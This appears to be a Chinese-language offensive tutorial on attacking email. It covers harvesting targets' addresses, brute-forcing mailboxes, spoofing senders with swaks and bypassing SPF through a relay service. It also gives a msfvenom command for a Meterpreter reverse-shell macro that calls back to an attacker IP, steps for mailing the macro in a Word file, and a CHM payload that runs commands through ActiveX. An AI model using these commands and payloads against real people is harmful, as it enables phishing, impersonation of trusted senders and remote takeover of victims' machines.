简介

邮件渗透技术

流程

信息搜集

方式一：

寻找目标邮件服务器以及 web 端邮箱入口
获取目标 web 网站，拿到真实 ip （如 MX 记录获取真实ip，第三方邮件服务器此方式失效）
随后对获取到的目标真实 ip 进行 C 段扫描。针对目标常用邮件协议端口25,109,110,143,465,995,993,994 。

方式二：

通过子域名扫描，获取目标子域名，从中筛选出可能与邮件服务有关的域名

方式三：

通过搜索引擎语法爬取

site:target.com intitle:”Outlook Web App”

site:target.com intitle:”mail”

site:target.com intitle:”webmail”

Shodan、fofa、zoomeye搜索等。

第三方网站批量搜集目标邮箱

https://hunter.io/

http://www.skymem.info/

https://www.email-format.com/i/search/

https://github.com/laramies/theHarvester 邮件信息侦查工具，kali 集成

验证邮件地址

通过工具查询邮件地址是否存在

邮箱爆破

如果目标邮箱并非第三方邮箱，如百度，新浪，阿里，腾讯等等邮箱，可以使用密码爆破的手段获取目标邮箱密码，进行钓鱼。

临时邮件

邮件伪造

SPF: 可以大致理解它的作用是确认邮件的ip地址到底是不是在它域名的spf记录里面，如果在的话，就说明一封正确的邮件，不是的话就会被丢弃。SPF是为了防范垃圾邮件而提出来的一种DNS记录类型，它是一种TXT类型的记录，它用于登记某个域名拥有的用来外发邮件的所有IP地址。
DKIM:它的作用主要是来校验邮件数据在传输过程中是否被修改过，也可以简单的理解为确保邮件在发送过程中的完整性。主要步骤：

发件人域名签名：发件人通过私钥对邮件头和正文进行数字签名，并将签名结果添加到邮件头中。
DNS记录验证：接收邮件服务器在收到邮件后，会从DNS记录中获取发件人域名的公钥，用于验证邮件头中的签名结果是否正确。
签名验证：邮件接收方使用公钥验证邮件头中的签名结果，并对比签名前后的邮件头和正文内容是否一致，以确定邮件来源是否被篡改或伪造。

方式：

一般情况下没有SPF可以直接用swaks工具伪造。

swaks --body "test111 mail 内容" --header "subject:mail title标题" --ehlo "mail ehlo head"  -t lfpqjqqmrl@iubridge.com  -f admin@qq.com
使用swaks 发送邮件
参数说明
swaks –to test@qq.com //首先测试邮箱的连通性；

            –to test@gmail.com //接件人邮箱；
            –from test@qq.com //发件人邮箱；
            –ehlo qq.com //伪造邮件ehlo头，即是发件人邮箱的域名。提供身份认证；
            –server mail.smtp2go.com //服务邮件域
            –body “test” //引号中的内容即为邮件正文，可直接引用文件；
            –data ./Desktop/email.txt //将正常源邮件的内容保存成TXT文件，再作为正常邮件发送；
            –header “Subject:标题” //邮件标题;
            –header-X-Mailer gmail.com //X-Mailer标头表示用于起草和发送原始电子邮件的程序
            –h-From: ‘boss admin@gmail.com‘ //伪造的发件人邮箱；
            –attach /root/test.txt //附件

SPF 绕过

在有SPF的情况下，就需要绕过SPF,可以使用swaks+smtp2go，需要借助到邮件托管平台来绕过SPF监测。

swaks --to xxx@163.com 
--from  admin@gov.com  
--ehlo  xxx  
--body  “hello ，i'm 007"
--server mail.smtp2go.com -p 2525 -au user -ap pass
使用邮件托管平台代发绕过

钓鱼文件

宏文件

可以使用Metasploit中的msfvenom来生成带有恶意宏的Word文档。
下面是一个简单的示例步骤：

1.生成payload：使用msfvenom生成恶意的payload。例如，要生成一个Meterpreter的payload，输入以下命令：

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f vba > payload.vba

其中，LHOST参数为攻击者IP地址，LPORT参数为攻击者监听的端口号。

2.编写Word文档：创建一个新的Word文档，并添加一个宏。在宏中，使用ActiveDocument.VBProject.VBComponents.Import方法将生成的payload.vba导入到Word文档中。

3.发送邮件：将带有恶意宏的Word文档作为附件发送给目标用户。

伪造扩展名 kilerrat 工具
文件捆绑
CHM钓鱼

**CHM简介**

CHM是微软推出的基于HTML的帮助文件系统，被 IE 浏览器支持的JavaScript, VBScript, ActiveX,等
CHM同样支持。因此使用CHM作为钓鱼的payload非常合适。本文总结了两种基于CHM执行命令的方式。

************************************使用com控件命令执行
使用了js调用com控件执行命令
<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
command exec 
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
 <PARAM name="Button" value="Bitmap::shortcut">
 <PARAM name="Item1" value=',calc.exe'>
 <PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>************************************